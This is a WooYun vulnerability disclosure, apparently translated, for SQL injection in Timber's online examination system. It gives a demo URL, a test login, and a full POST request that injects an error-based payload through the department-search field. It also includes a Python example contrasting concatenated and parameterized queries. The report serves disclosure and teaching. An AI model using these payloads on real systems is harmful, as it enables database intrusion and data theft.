Vulnerability summary

Defect ID: wooyun-2014-070604

Title: SQL injection vulnerability in an online examination system (tested on the demo)

Vendor: 天柏科技 (Timber Technology)

Author: 路人甲

Submitted: 2014-08-01 15:48

Fixed: 2014-10-30 15:50

Published: 2014-10-30 15:50

Vulnerability type: SQL injection

Severity: High

Self-assessed rank: 18

Status: handed over to a third-party partner organization (CNCERT, National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2014-08-01: details sent to the vendor, awaiting the vendor's response
2014-08-06: vendor confirmed; details visible to the vendor only
2014-08-09: details opened to third-party security partners
2014-09-30: details opened to core white hats and domain experts
2014-10-10: details opened to regular white hats
2014-10-20: details opened to intern white hats
2014-10-30: details made public

Brief description:

SQL injection in an online examination system

Details:

Timber (天柏) online examination system
http://www.timber2005.com/
Demo:
http://exam1.timber2005.com/default.aspx
Test account:
master/123456
http://exam1.timber2005.com/system/Dep_Right.aspx

POST body sent to the URL above (the injected parameter is DEP_NAME2; the rest is ASP.NET ViewState and the other department-search fields):

Dep_Info1_TreeView1_ExpandState=nnnennenennennenennnneeennennennennennennennn&Dep_Info1_TreeView1_SelectedNode=&__EVENTTARGET=&__EVENTARGUMENT=&Dep_Info1_TreeView1_PopulateLog=&__VIEWSTATE=%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%2BHgVWYWx1ZQUCMzUeCEV4cGFuZGVkZx4MU2VsZWN0QWN0aW9uCyouU3lzdGVtLldlYi5VSS5XZWJDb250cm9scy5UcmVlTm9kZVNlbGVjdEFjdGlvbgFkFCsAAhYIHwYFf%2Be7hOe7h%2BS6uuS6i%2BenkTxhIGhyZWY9JyNwJyBzdHlsZT0nbWFyZ2luLWxlZnQ6MTBweDtjb2xvcjpyZWQ7JyBvbmNsaWNrPSJva0tCdXR0b25DbGljaygnMzYnLCfnu4Tnu4fkurrkuovnp5EnLCczJykiPumAieaLqTwvYT4fBwUCMzYfCGcfCQsrBAFkFCsAAhYIHwYFf%2BWuo%2BS8oOe7n%2BaImOenkTxhIGhyZWY9JyNwJyBzdHlsZT0nbWFyZ2luLWxlZnQ6MTBweDtjb2xvcjpyZWQ7JyBvbmNsaWNrPSJva0tCdXR0b25DbGljaygnNTAnLCflrqPkvKDnu5%2FmiJjnp5EnLCcyJykiPumAieaLqTwvYT4fBwUCNTAfCGcfCQsrBAFkFCsAAhYIHwYFhQHnpL7kvJrnu7zlkIjlhZrlp5Q8YSBocmVmPScjcCcgc3R5bGU9J21hcmdpbi1sZWZ0OjEwcHg7Y29sb3I6cmVkOycgb25jbGljaz0ib2tLQnV0dG9uQ2xpY2soJzUzJywn56S%2B5Lya57u85ZCI5YWa5aeUJywnMicpIj7pgInmi6k8L2E%2BHwcFAjUzHwhnHwkLKwQBFCsAAgUDMDowFCsAAhYIHwYFZ%2BWxsTxhIGhyZWY9JyNwJyBzdHlsZT0nbWFyZ2luLWxlZnQ6MTBweDtjb2xvcjpyZWQ7JyBvbmNsaWNrPSJva0tCdXR0b25DbGljaygnNTQnLCflsbEnLCcyJykiPumAieaLqTwvYT4fBwUCNTQfCGcfCQsrBAFkFCsAAhYIHwYFc%2Be6quW3peWnlDxhIGhyZWY9JyNwJyBzdHlsZT0nbWFyZ2luLWxlZnQ6MTBweDtjb2xvcjpyZWQ7JyBvbmNsaWNrPSJva0tCdXR0b25DbGljaygnNTUnLCfnuqrlt6Xlp5QnLCcyJykiPumAieaLqTwvYT4fBwUCNTUfCGcfCQsrBAFkFCsAAhYIHwYFeeebkeedo%2BmDqOmXqDxhIGhyZWY9JyNwJyBzdHlsZT0nbWFyZ2luLWxlZnQ6MTBweDtjb2xvcjpyZWQ7JyBvbmNsaWNrPSJva0tCdXR0b25DbGljaygnNTEnLCfnm5HnnaPpg6jpl6gnLCcyJykiPumAieaLqTwvYT4fBwUCNTEfCGcfCQsrBAEUKwACBQMwOjAUKwACFggfBgV555uR6ICD6ICB5biIPGEgaHJlZj0nI3AnIHN0eWxlPSdtYXJnaW4tbGVmdDoxMHB4O2NvbG9yOnJlZDsnIG9uY2xpY2s9Im9rS0J1dHRvbkNsaWNrKCc1MicsJ%2BebkeiAg%2BiAgeW4iCcsJzInKSI%2B6YCJ5oupPC9hPh8HBQI1Mh8IZx8JCysEAWQUKwACFggfBgVz5Zui5bel5aeUPGEgaHJlZj0nI3AnIHN0eWxlPSdtYXJnaW4tbGVmdDoxMHB4O2NvbG9yOnJlZDsnIG9uY2xpY2s9Im9rS0J1dHRvbkNsaWNrKCc0NycsJ%2BWbouW3peWnlCcsJzInKSI%2B6YCJ5oupPC9hPh8HBQI0Nx8IZx8JCysEARQrAAIFAzA6MBQrAAIWCB8G
BXPlt6XkvZzlrqQ8YSBocmVmPScjcCcgc3R5bGU9J21hcmdpbi1sZWZ0OjEwcHg7Y29sb3I6cmVkOycgb25jbGljaz0ib2tLQnV0dG9uQ2xpY2soJzQ5Jywn5bel5L2c5a6kJywnNCcpIj7pgInmi6k8L2E%2BHwcFAjQ5HwhnHwkLKwQBZBQrAAIWCB8GBW3lpofogZQ8YSBocmVmPScjcCcgc3R5bGU9J21hcmdpbi1sZWZ0OjEwcHg7Y29sb3I6cmVkOycgb25jbGljaz0ib2tLQnV0dG9uQ2xpY2soJzM4Jywn5aaH6IGUJywnMicpIj7pgInmi6k8L2E%2BHwcFAjM4HwhnHwkLKwQBZBQrAAIWCB8GBX%2FooYzmlL%2Flip7lhazlrqQ8YSBocmVmPScjcCcgc3R5bGU9J21hcmdpbi1sZWZ0OjEwcHg7Y29sb3I6cmVkOycgb25jbGljaz0ib2tLQnV0dG9uQ2xpY2soJzQyJywn6KGM5pS%2F5Yqe5YWs5a6kJywnMicpIj7pgInmi6k8L2E%2BHwcFAjQyHwhnHwkLKwQBFCsABQUPMDowLDA6MSwwOjIsMDozFCsAAhYIHwYFc%2Biwg%2BW6puWupDxhIGhyZWY9JyNwJyBzdHlsZT0nbWFyZ2luLWxlZnQ6MTBweDtjb2xvcjpyZWQ7JyBvbmNsaWNrPSJva0tCdXR0b25DbGljaygnNDMnLCfosIPluqblrqQnLCcyJykiPumAieaLqTwvYT4fBwUCNDMfCGcfCQsrBAFkFCsAAhYIHwYFc%2BS9nOS4mumYnzxhIGhyZWY9JyNwJyBzdHlsZT0nbWFyZ2luLWxlZnQ6MTBweDtjb2xvcjpyZWQ7JyBvbmNsaWNrPSJva0tCdXR0b25DbGljaygnNDQnLCfkvZzkuJrpmJ8nLCcyJykiPumAieaLqTwvYT4fBwUCNDQfCGcfCQsrBAFkFCsAAhYIHwYFdeWKnuWFrOWupDI8YSBocmVmPScjcCcgc3R5bGU9J21hcmdpbi1sZWZ0OjEwcHg7Y29sb3I6cmVkOycgb25jbGljaz0ib2tLQnV0dG9uQ2xpY2soJzQ2Jywn5Yqe5YWs5a6kMicsJzMnKSI%2B6YCJ5oupPC9hPh8HBQI0Nh8IZx8JCysEARQrAAIFAzA6MBQrAAIWCB8GBXPmsLTnlLXotLk8YSBocmVmPScjcCcgc3R5bGU9J21hcmdpbi1sZWZ0OjEwcHg7Y29sb3I6cmVkOycgb25jbGljaz0ib2tLQnV0dG9uQ2xpY2soJzQ4Jywn5rC055S16LS5JywnMycpIj7pgInmi6k8L2E%2BHwcFAjQ4HwhnHwkLKwQBZBQrAAIWCB8GBXXlip7lhazlrqQxPGEgaHJlZj0nI3AnIHN0eWxlPSdtYXJnaW4tbGVmdDoxMHB4O2NvbG9yOnJlZDsnIG9uY2xpY2s9Im9rS0J1dHRvbkNsaWNrKCcxNycsJ%2BWKnuWFrOWupDEnLCczJykiPumAieaLqTwvYT4fBwUCMTcfCGcfCQsrBAEUKwACBQMwOjAUKwACFggfBgV55byA5Y%2BR5LiA6YOoPGEgaHJlZj0nI3AnIHN0eWxlPSdtYXJnaW4tbGVmdDoxMHB4O2NvbG9yOnJlZDsnIG9uY2xpY2s9Im9rS0J1dHRvbkNsaWNrKCcyMCcsJ%2BW8gOWPkeS4gOmDqCcsJzInKSI%2B6YCJ5oupPC9hPh8HBQIyMB8IZx8JCysEAWQUKwACFggfBgV55YiG5YWs5Y%2B45LiJPGEgaHJlZj0nI3AnIHN0eWxlPSdtYXJnaW4tbGVmdDoxMHB4O2NvbG9yOnJlZDsnIG9uY2xpY2s9Im9rS0J1dHRvbkNsaWNrKCcxOScsJ%2BWIhuWFrOWPuOS4iScsJzEnKSI%2B6YCJ5oupPC9hPh8HBQIxOR8IZx8JCysEAWQUKwACFggfBgV55YiG
5YWs5Y%2B45LqMPGEgaHJlZj0nI3AnIHN0eWxlPSdtYXJnaW4tbGVmdDoxMHB4O2NvbG9yOnJlZDsnIG9uY2xpY2s9Im9rS0J1dHRvbkNsaWNrKCcxOCcsJ%2BWIhuWFrOWPuOS6jCcsJzEnKSI%2B6YCJ5oupPC9hPh8HBQIxOB8IZx8JCysEAWQUKwACFggfBgVz56eR5oqA6YOoPGEgaHJlZj0nI3AnIHN0eWxlPSdtYXJnaW4tbGVmdDoxMHB4O2NvbG9yOnJlZDsnIG9uY2xpY2s9Im9rS0J1dHRvbkNsaWNrKCc1OCcsJ%2BenkeaKgOmDqCcsJzEnKSI%2B6YCJ5oupPC9hPh8HBQI1OB8IZx8JCysEAWQUKwACFggfBgVy5oC757uP55CGPGEgaHJlZj0nI3AnIHN0eWxlPSdtYXJnaW4tbGVmdDoxMHB4O2NvbG9yOnJlZDsnIG9uY2xpY2s9Im9rS0J1dHRvbkNsaWNrKCcxJywn5oC757uP55CGJywnMicpIj7pgInmi6k8L2E%2BHwcFATEfCGcfCQsrBAEUKwACBQMwOjAUKwACFggfBgVy5Yqe5YWs5a6kPGEgaHJlZj0nI3AnIHN0eWxlPSdtYXJnaW4tbGVmdDoxMHB4O2NvbG9yOnJlZDsnIG9uY2xpY2s9Im9rS0J1dHRvbkNsaWNrKCc3Jywn5Yqe5YWs5a6kJywnMycpIj7pgInmi6k8L2E%2BHwcFATcfCGcfCQsrBAEUKwACBQMwOjAUKwACFggfBgVv5rWL6K%2BVMTxhIGhyZWY9JyNwJyBzdHlsZT0nbWFyZ2luLWxlZnQ6MTBweDtjb2xvcjpyZWQ7JyBvbmNsaWNrPSJva0tCdXR0b25DbGljaygnMjEnLCfmtYvor5UxJywnNCcpIj7pgInmi6k8L2E%2BHwcFAjIxHwhnHwkLKwQBFCsABAULMDowLDA6MSwwOjIUKwACFggfBgVv5rWL6K%2BVMjxhIGhyZWY9JyNwJyBzdHlsZT0nbWFyZ2luLWxlZnQ6MTBweDtjb2xvcjpyZWQ7JyBvbmNsaWNrPSJva0tCdXR0b25DbGljaygnMjInLCfmtYvor5UyJywnOScpIj7pgInmi6k8L2E%2BHwcFAjIyHwhnHwkLKwQBZBQrAAIWCB8GBW%2FmtYvor5UzPGEgaHJlZj0nI3AnIHN0eWxlPSdtYXJnaW4tbGVmdDoxMHB4O2NvbG9yOnJlZDsnIG9uY2xpY2s9Im9rS0J1dHRvbkNsaWNrKCcyMycsJ%2Ba1i%2BivlTMnLCc3JykiPumAieaLqTwvYT4fBwUCMjMfCGcfCQsrBAFkFCsAAhYIHwYFb%2Ba1i%2BivlTQ8YSBocmVmPScjcCcgc3R5bGU9J21hcmdpbi1sZWZ0OjEwcHg7Y29sb3I6cmVkOycgb25jbGljaz0ib2tLQnV0dG9uQ2xpY2soJzI0Jywn5rWL6K%2BVNCcsJzYnKSI%2B6YCJ5oupPC9hPh8HBQIyNB8IZx8JCysEARQrAAQFCzA6MCwwOjEsMDoyFCsAAhYIHwYFaWFhYWE8YSBocmVmPScjcCcgc3R5bGU9J21hcmdpbi1sZWZ0OjEwcHg7Y29sb3I6cmVkOycgb25jbGljaz0ib2tLQnV0dG9uQ2xpY2soJzI3JywnYWFhYScsJzInKSI%2B6YCJ5oupPC9hPh8HBQIyNx8IZx8JCysEAWQUKwACFggfBgVpZGRkZDxhIGhyZWY9JyNwJyBzdHlsZT0nbWFyZ2luLWxlZnQ6MTBweDtjb2xvcjpyZWQ7JyBvbmNsaWNrPSJva0tCdXR0b25DbGljaygnMjYnLCdkZGRkJywnMicpIj7pgInmi6k8L2E%2BHwcFAjI2HwhnHwkLKwQBZBQrAAIWCB8GBWcxMjM8YSBocmVmPScjcCcgc3R5bGU9J21hcmdpbi1sZWZ0OjEwcHg7Y29sb3I6cmVk
Oycgb25jbGljaz0ib2tLQnV0dG9uQ2xpY2soJzI1JywnMTIzJywnNycpIj7pgInmi6k8L2E%2BHwcFAjI1HwhnHwkLKwQBFCsAAgUDMDowFCsAAhYIHwYFZ3FxcTxhIGhyZWY9JyNwJyBzdHlsZT0nbWFyZ2luLWxlZnQ6MTBweDtjb2xvcjpyZWQ7JyBvbmNsaWNrPSJva0tCdXR0b25DbGljaygnMjgnLCdxcXEnLCc4JykiPumAieaLqTwvYT4fBwUCMjgfCGcfCQsrBAFkFCsAAhYIHwYFcui0ouWKoemDqDxhIGhyZWY9JyNwJyBzdHlsZT0nbWFyZ2luLWxlZnQ6MTBweDtjb2xvcjpyZWQ7JyBvbmNsaWNrPSJva0tCdXR0b25DbGljaygnMicsJ%2Bi0ouWKoemDqCcsJzEnKSI%2B6YCJ5oupPC9hPh8HBQEyHwhnHwkLKwQBZBQrAAIWCB8GBXLluILlnLrpg6g8YSBocmVmPScjcCcgc3R5bGU9J21hcmdpbi1sZWZ0OjEwcHg7Y29sb3I6cmVkOycgb25jbGljaz0ib2tLQnV0dG9uQ2xpY2soJzMnLCfluILlnLrpg6gnLCcxJykiPumAieaLqTwvYT4fBwUBMx8IZx8JCysEARQrAAMFBzA6MCwwOjEUKwACFggfBgV45biC5Zy66LCD56CUPGEgaHJlZj0nI3AnIHN0eWxlPSdtYXJnaW4tbGVmdDoxMHB4O2NvbG9yOnJlZDsnIG9uY2xpY2s9Im9rS0J1dHRvbkNsaWNrKCc4Jywn5biC5Zy66LCD56CUJywnMicpIj7pgInmi6k8L2E%2BHwcFATgfCGcfCQsrBAFkFCsAAhYIHwYFeOa2ieWkluWFrOWFszxhIGhyZWY9JyNwJyBzdHlsZT0nbWFyZ2luLWxlZnQ6MTBweDtjb2xvcjpyZWQ7JyBvbmNsaWNrPSJva0tCdXR0b25DbGljaygnOScsJ%2Ba2ieWkluWFrOWFsycsJzInKSI%2B6YCJ5oupPC9hPh8HBQE5HwhnHwkLKwQBZBQrAAIWCB8GBXLlrqLmiLfpg6g8YSBocmVmPScjcCcgc3R5bGU9J21hcmdpbi1sZWZ0OjEwcHg7Y29sb3I6cmVkOycgb25jbGljaz0ib2tLQnV0dG9uQ2xpY2soJzQnLCflrqLmiLfpg6gnLCcxJykiPumAieaLqTwvYT4fBwUBNB8IZx8JCysEARQrAAMFBzA6MCwwOjEUKwACFggfBgV55bm%2F5ZGK5Lia5YqhPGEgaHJlZj0nI3AnIHN0eWxlPSdtYXJnaW4tbGVmdDoxMHB4O2NvbG9yOnJlZDsnIG9uY2xpY2s9Im9rS0J1dHRvbkNsaWNrKCcxMCcsJ%2BW5v%2BWRiuS4muWKoScsJzQnKSI%2B6YCJ5oupPC9hPh8HBQIxMB8IZx8JCysEAWQUKwACFggfBgV55biC5Zy65oub5ZWGPGEgaHJlZj0nI3AnIHN0eWxlPSdtYXJnaW4tbGVmdDoxMHB4O2NvbG9yOnJlZDsnIG9uY2xpY2s9Im9rS0J1dHRvbkNsaWNrKCcxMScsJ%2BW4guWcuuaLm%2BWVhicsJzInKSI%2B6YCJ5oupPC9hPh8HBQIxMR8IZx8JCysEAWQUKwACFggfBgVy5Yib5L2c6YOoPGEgaHJlZj0nI3AnIHN0eWxlPSdtYXJnaW4tbGVmdDoxMHB4O2NvbG9yOnJlZDsnIG9uY2xpY2s9Im9rS0J1dHRvbkNsaWNrKCc1Jywn5Yib5L2c6YOoJywnMicpIj7pgInmi6k8L2E%2BHwcFATUfCGcfCQsrBAEUKwADBQcwOjAsMDoxFCsAAhYIHwYFeeihjOmUgOetluWIkjxhIGhyZWY9JyNwJyBzdHlsZT0nbWFyZ2luLWxlZnQ6MTBweDtjb2xvcjpyZWQ7JyBvbmNsaWNrPSJva0tCdXR0b25DbGljaygn
MTInLCfooYzplIDnrZbliJInLCczJykiPumAieaLqTwvYT4fBwUCMTIfCGcfCQsrBAFkFCsAAhYIHwYFeeiuvuiuoeWIm%2BS9nDxhIGhyZWY9JyNwJyBzdHlsZT0nbWFyZ2luLWxlZnQ6MTBweDtjb2xvcjpyZWQ7JyBvbmNsaWNrPSJva0tCdXR0b25DbGljaygnMTMnLCforr7orqHliJvkvZwnLCcyJykiPumAieaLqTwvYT4fBwUCMTMfCGcfCQsrBAFkFCsAAhYIHwYFcuWqkuS7i%2BmDqDxhIGhyZWY9JyNwJyBzdHlsZT0nbWFyZ2luLWxlZnQ6MTBweDtjb2xvcjpyZWQ7JyBvbmNsaWNrPSJva0tCdXR0b25DbGljaygnNicsJ%2BWqkuS7i%2BmDqCcsJzEnKSI%2B6YCJ5oupPC9hPh8HBQE2HwhnHwkLKwQBFCsAAwUHMDowLDA6MRQrAAIWCB8GBXnlqpLkvZPku6PnkIY8YSBocmVmPScjcCcgc3R5bGU9J21hcmdpbi1sZWZ0OjEwcHg7Y29sb3I6cmVkOycgb25jbGljaz0ib2tLQnV0dG9uQ2xpY2soJzE0Jywn5aqS5L2T5Luj55CGJywnMicpIj7pgInmi6k8L2E%2BHwcFAjE0HwhnHwkLKwQBZBQrAAIWCB8GBXnlvaLosaHljIXoo4U8YSBocmVmPScjcCcgc3R5bGU9J21hcmdpbi1sZWZ0OjEwcHg7Y29sb3I6cmVkOycgb25jbGljaz0ib2tLQnV0dG9uQ2xpY2soJzE1Jywn5b2i6LGh5YyF6KOFJywnMScpIj7pgInmi6k8L2E%2BHwcFAjE1HwhnHwkLKwQBZBQrAAIWCB8GBX%2FotKjph4%2Fmo4Dpqozpg6g8YSBocmVmPScjcCcgc3R5bGU9J21hcmdpbi1sZWZ0OjEwcHg7Y29sb3I6cmVkOycgb25jbGljaz0ib2tLQnV0dG9uQ2xpY2soJzQ1Jywn6LSo6YeP5qOA6aqM6YOoJywnMScpIj7pgInmi6k8L2E%2BHwcFAjQ1HwhnHwkLKwQBZGQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgEFE0RlcF9JbmZvMSRUcmVlVmlldzFJqXp3qAF%2FjJs1wwfQ1wOD2x1hig%3D%3D&DEP_NAME2=+%27and+db_name%28%29%3E0--&search=%E6%9F%A5%E8%AF%A2&DEP_PNAME=%24%E6%A0%B9%E8%8A%82%E7%82%B9&DEP_NAME=&DEP_SORT=&DEP_MARK=&SORT=DEP_SORT&DEP_PID=&DEP_LEVEL=0&Dep_Info1%24SORT=DEP_SORT


Select Organization (组织机构) > Department Management (部门管理) and enter in the department search field: 'and db_name()>0--

[screenshot: 部门管理.png (department management page)]

Proof of vulnerability:

[screenshot: SQL注入.png (database error page)]

Error-based injection: the input is concatenated into the query, so the injected db_name()>0 comparison reaches the database, and the error it raises is echoed back by the application. On SQL Server, comparing the nvarchar result of db_name() with the integer 0 fails with a conversion error whose message contains the database name, which is what the screenshot shows.
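The two steps above (a search field whose value is spliced into the SQL text, and an error-based payload that makes the database talk back) can be reproduced offline. The following is an added example, not code from the Timber exam system, whose ASP.NET/SQL Server source is not on this page. It assumes a query of the shape `WHERE DEP_NAME LIKE '%<input>%'` built by string concatenation, uses SQLite in place of SQL Server so it runs anywhere, and the DEP_INFO table and its rows are constructed sample data. The page's own payload is the decoded value of DEP_NAME2 from the request above.

```python
"""Vulnerable vs. parameterized department search (added example).

SQLite stands in for SQL Server. The query shape and the DEP_INFO table are
assumptions; they are not the exam system's real schema or code.
"""
import sqlite3

# Constructed sample data, modelled on the DEP_* field names in the request.
SAMPLE_DEPARTMENTS = [
    (1, "总经理", 2),
    (2, "财务部", 1),
    (3, "市场部", 1),
]

# Decoded DEP_NAME2 value from the report: "+%27and+db_name%28%29%3E0--"
PAGE_PAYLOAD = " 'and db_name()>0--"
# A plain boolean payload that also works on SQLite, for comparison.
OR_TRUE_PAYLOAD = "' or 1=1--"


def make_db() -> sqlite3.Connection:
    """In-memory database seeded with the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE DEP_INFO (DEP_ID INTEGER, DEP_NAME TEXT, DEP_LEVEL INTEGER)"
    )
    conn.executemany("INSERT INTO DEP_INFO VALUES (?, ?, ?)", SAMPLE_DEPARTMENTS)
    return conn


def build_query_vulnerable(dep_name: str) -> str:
    """Assumed shape of the original query: the search text is concatenated
    straight into the SQL, so a single quote ends the string literal and
    everything after it is parsed as SQL; '--' comments out the rest."""
    return (
        "SELECT DEP_ID, DEP_NAME FROM DEP_INFO "
        f"WHERE DEP_NAME LIKE '%{dep_name}%'"
    )


def search_vulnerable(conn: sqlite3.Connection, dep_name: str) -> list:
    return conn.execute(build_query_vulnerable(dep_name)).fetchall()


def search_safe(conn: sqlite3.Connection, dep_name: str) -> list:
    """Hardened form: the value travels as a bound parameter, so quotes,
    'and', db_name() and '--' are just characters inside the LIKE pattern.
    (In the ASP.NET original this is SqlCommand.Parameters.AddWithValue.)"""
    return conn.execute(
        "SELECT DEP_ID, DEP_NAME FROM DEP_INFO WHERE DEP_NAME LIKE ?",
        (f"%{dep_name}%",),
    ).fetchall()


def probe(search, conn: sqlite3.Connection, payload: str) -> tuple:
    """Run one search and summarise the outcome as ('rows', n) or
    ('error', message). An 'error' outcome for an injected payload is the
    signal the report exploits: on SQLite the unknown function db_name()
    fails at parse time; on SQL Server db_name() exists and the nvarchar > int
    comparison fails with a conversion error that embeds the database name."""
    try:
        return ("rows", len(search(conn, payload)))
    except sqlite3.Error as exc:
        return ("error", str(exc))


if __name__ == "__main__":
    db = make_db()
    for name, fn in (("vulnerable", search_vulnerable), ("safe", search_safe)):
        for payload in ("财务", OR_TRUE_PAYLOAD, PAGE_PAYLOAD):
            print(f"{name:10s} {payload!r:28s} -> {probe(fn, db, payload)}")
```

Run as a script it prints one line per (handler, input) pair: the vulnerable handler returns every row for `' or 1=1--` and raises a database error for the page's payload, while the parameterized handler returns zero rows for both and never errors. The difference between "error" and "rows" for the same input is exactly the oracle an error-based injection relies on, which is why the fix is binding parameters rather than filtering characters.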

Remediation:

Filter the parameter; more robustly, pass DEP_NAME2 (and the other search fields) to the database as bound parameters instead of concatenating them into the SQL string, and stop echoing raw database errors to the client.

Copyright notice: when reposting, please credit the source 路人甲@乌云 (WooYun)


Vulnerability response

Vendor response:

Severity: High

Vulnerability rank: 13

Confirmed: 2014-08-06 08:35

Vendor reply:

CNVD confirmed the reported situation. Through instance testing it confirmed that government websites are affected, and the case has been forwarded through CNCERT to the corresponding branch centers to handle the cases in their provinces.

Latest status:

None yet